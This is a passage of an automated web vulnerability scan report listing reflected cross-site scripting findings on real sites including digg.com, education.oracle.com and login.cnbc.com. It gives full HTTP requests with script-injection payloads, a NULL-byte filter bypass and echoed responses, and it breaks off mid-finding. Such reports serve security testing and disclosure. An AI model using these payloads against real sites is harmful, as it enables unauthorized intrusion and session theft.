HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript ETag: "1ea7ed1-4fbc-4a85262d8c280" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=416 Date: Tue, 06 Sep 2011 15:16:00 GMT Content-Length: 1895 Connection: close // Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved. var zzTitle=''; var w0=new Image(); var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat=''; var zzhasAd; ...[SNIP]... %3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9 ">...[SNIP]...
3.30. http://digg.com/submit [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003355b"><script>alert(1)</script>0a3916a9e29 was submitted in the REST URL parameter 1. This input was echoed as 3355b"><script>alert(1)</script>0a3916a9e29 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%003355b"><script>alert(1)</script>0a3916a9e29 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:48 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=19408553 10.2.130.24 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14406 <!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>error_ - Digg</title> <meta name="keywords" content="Digg, pictures, break...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003355b"><script>alert(1)</script>0a3916a9e29 .rss">...[SNIP]...
3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/db_pages.getCourseDesc
Issue detail
The value of the dc request parameter is copied into an HTML comment. The payload 2e67c--><a%20b%3dc>c97d7ad58db was submitted in the dc parameter. This input was echoed as 2e67c--><a b=c>c97d7ad58db in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pls/web_prod-plq-dad/db_pages.getCourseDesc?dc=D70302_13531452e67c--><a%20b%3dc>c97d7ad58db HTTP/1.1 Host: education.oracle.com Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819943764065,1) Content-Length: 3769 Date: Tue, 06 Sep 2011 15:55:12 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me...[SNIP]... <!-- No course found for id D70302_13531452e67c--><a b=c>c97d7ad58db -->...[SNIP]...
3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/demandcapture_customer.customer_display
Issue detail
The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56fe7"%3balert(1)//452b678fc04 was submitted in the p_lang parameter. This input was echoed as 56fe7";alert(1)//452b678fc04 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=&p_org_id=&p_lang=56fe7"%3balert(1)//452b678fc04 HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057828533965601,0) Content-Length: 570 Date: Tue, 06 Sep 2011 15:59:32 GMT <script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7";alert(1)//452b678fc04 &p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&cust_region=&cust_...[SNIP]...
3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/demandcapture_customer.customer_display
Issue detail
The value of the p_wddi_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d8a"%3balert(1)//25f551d98f2 was submitted in the p_wddi_id parameter. This input was echoed as e4d8a";alert(1)//25f551d98f2 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=e4d8a"%3balert(1)//25f551d98f2 &p_org_id=&p_lang= HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057875778605369,1) Content-Length: 570 Date: Tue, 06 Sep 2011 15:59:32 GMT <script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=e4d8a";alert(1)//25f551d98f2 &p_org_id=&p_lang=&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&...[SNIP]...
3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/header
Issue detail
The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ec"><script>alert(1)</script>4d22a5b224d was submitted in the lang parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=USd40ec"><script>alert(1)</script>4d22a5b224d HTTP/1.1 Host: education.oracle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057776994499472,1) Content-Length: 950 Date: Tue, 06 Sep 2011 16:01:50 GMT <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <TITLE>Oracle University Courses & Registration </TITLE> <LINK REL="stylesheet" href="/education/css/oracle.css"> <lin...[SNIP]... <SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/ 1001 USd40ec"><script>alert(1)</script>4d22a5b224d _rd_temp_config.js">...[SNIP]...
3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/header
Issue detail
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4202e"%3balert(1)//231562bd186 was submitted in the lang parameter. This input was echoed as 4202e";alert(1)//231562bd186 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=US4202e"%3balert(1)//231562bd186 HTTP/1.1 Host: education.oracle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057768404565213,0) Content-Length: 920 Date: Tue, 06 Sep 2011 16:01:51 GMT <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <TITLE>Oracle University Courses & Registration </TITLE> <LINK REL="stylesheet" href="/education/css/oracle.css"> <lin...[SNIP]... <SCRIPT language=JavaScript>var lang = "US4202e";alert(1)//231562bd186 "</SCRIPT>...[SNIP]...
3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/show_desc.redirect
Issue detail
The value of the p_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6e2"><script>alert(1)</script>818bc7ecf2f was submitted in the p_url parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2"><script>alert(1)</script>818bc7ecf2f HTTP/1.1 Host: education.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/ Set-Cookie: p_lang=US; domain=.oracle.com; path=/ Connection: Close Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057845713838882,1) Content-Length: 1022 Date: Tue, 06 Sep 2011 15:59:36 GMT <HTML> <HEAD> <TITLE>Catalog Search Results</TITLE> <SCRIPT language=JavaScript>document.domain="oracle.com"</SCRIPT> <SCRIPT language=JavaScript>var site_section = "Search"</SCRIPT> <script language=...[SNIP]... <FRAME SRC=" /pls/web_prod-plq-dad /webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2"><script>alert(1)</script>818bc7ecf2f " NAME="content" MARGINWIDTH=5 MARGINHEIGHT=0 SCROLLING=AUTO>...[SNIP]...
3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/webreg_course_index.main
Issue detail
The value of the p_lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f6e"><script>alert(1)</script>33d02dcf400 was submitted in the p_lang parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e262f6e"><script>alert(1)</script>33d02dcf400 HTTP/1.1 Host: education.oracle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US
Response
HTTP/1.1 200 OK Content-Length: 19101 Content-Type: text/html; charset=UTF-8 Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=200136460310,1) Date: Tue, 06 Sep 2011 16:02:10 GMT <!--*09:02:10*--> <HTML><HEAD> <TITLE>SSCD - Course Index</TITLE> <LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css"> <STYLE> TD.selected {BACKGROUND-COLOR: #CCCC99} TD.nonSelec...[SNIP]... <SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/ 1001 UScd6e262f6e"><script>alert(1)</script>33d02dcf400 _rd_temp_config.js">...[SNIP]...
3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://education.oracle.com
Path:
/pls/web_prod-plq-dad/webreg_course_index.main
Issue detail
The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76780"%3balert(1)//43d7466ae8e was submitted in the p_lang parameter. This input was echoed as 76780";alert(1)//43d7466ae8e in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780"%3balert(1)//43d7466ae8e HTTP/1.1 Host: education.oracle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US
Response
HTTP/1.1 200 OK Content-Length: 18996 Content-Type: text/html; charset=UTF-8 Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=216172922120704642,1) Date: Tue, 06 Sep 2011 16:02:12 GMT <!--*09:02:12*--> <HTML><HEAD> <TITLE>SSCD - Course Index</TITLE> <LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css"> <STYLE> TD.selected {BACKGROUND-COLOR: #CCCC99} TD.nonSelec...[SNIP]... <SCRIPT language=JavaScript>var lang = "UScd6e276780";alert(1)//43d7466ae8e "</SCRIPT>...[SNIP]...
3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b161b"-alert(1)-"550e756bc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09 =1 HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:23 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315321223_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:23 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:23 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 235 document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09 =1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">...[SNIP]...
3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/serve/fb/adtag.js
Issue detail
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3925"-alert(1)-"281d83ef8c3 was submitted in the type parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 HTTP/1.1 Host: imp.fetchback.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:22 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1315321222_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:22 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 15:00:22 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 232 document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 ' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">...[SNIP]...
3.41. http://js.revsci.net/gateway/gw.js [csid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://js.revsci.net
Path:
/gateway/gw.js
Issue detail
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ae529<script>alert(1)</script>55e88475fb6 was submitted in the csid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=F09828ae529<script>alert(1)</script>55e88475fb6 HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Tue, 06 Sep 2011 16:45:35 GMT Cache-Control: max-age=86400, private Expires: Wed, 07 Sep 2011 16:45:35 GMT X-Proc-ms: 0 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:45:34 GMT Content-Length: 128 /* * JavaScript include error: * The customer code "F09828AE529<SCRIPT>ALERT(1)</SCRIPT>55E88475FB6 " was not recognized. */
3.42. https://login.cnbc.com/cas/login [apphome parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the apphome request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c0"><script>alert(1)</script>0f8cf36ce47 was submitted in the apphome parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47 &login_view=subscription HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Referer: http://pro.cnbc.com/index.asp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:03:10 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Length: 7137 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... rm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47 &login_view=subscription">...[SNIP]...
3.43. https://login.cnbc.com/cas/login [jsessionid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9cd"><script>alert(1)</script>792007f2f0 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0 &login_view=register HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
